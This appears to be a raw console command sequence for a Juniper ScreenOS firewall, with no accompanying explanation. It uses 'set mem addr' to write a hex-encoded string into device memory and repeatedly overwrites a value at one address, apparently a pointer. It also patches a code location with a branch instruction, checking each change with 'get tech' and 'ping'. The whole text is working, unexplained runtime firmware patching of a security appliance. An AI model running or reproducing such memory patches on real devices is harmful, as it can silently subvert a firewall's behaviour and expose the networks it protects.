set mem addr 0x195c2bc 0x000636f0
ping
set mem addr 0x1a7d2a0 0x4d333241
set mem addr 0x1a7d2a4 0x3339382c
set mem addr 0x1a7d2a8 0x3031653a
set mem addr 0x1a7d2ac 0x33443230
set mem addr 0x1a7d2b0 0x30303334
set mem addr 0x1a7d2b4 0x33383630
set mem addr 0x1a7d2b8 0x34383030
set mem addr 0x1a7d2bc 0x62303639
set mem addr 0x1a7d2c0 0x32636263
set mem addr 0x1a7d2c4 0x33643230
set mem addr 0x1a7d2c8 0x30303639
set mem addr 0x1a7d2cc 0x36313239
set mem addr 0x1a7d2d0 0x66306363
set mem addr 0x1a7d2d4 0x37643238
set mem addr 0x1a7d2d8 0x30336136
set mem addr 0x1a7d2dc 0x34653830
set mem addr 0x1a7d2e0 0x30303230
set mem addr 0x1a7d2e4 0x00000000
set mem addr 0x195c2bc 0x0032a1e4
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x195c2bc 0x000636f0
get tech | in juniper
ping
set mem addr 0x34237c 0x48000014
set mem addr 0x195c2bc 0x006485b8
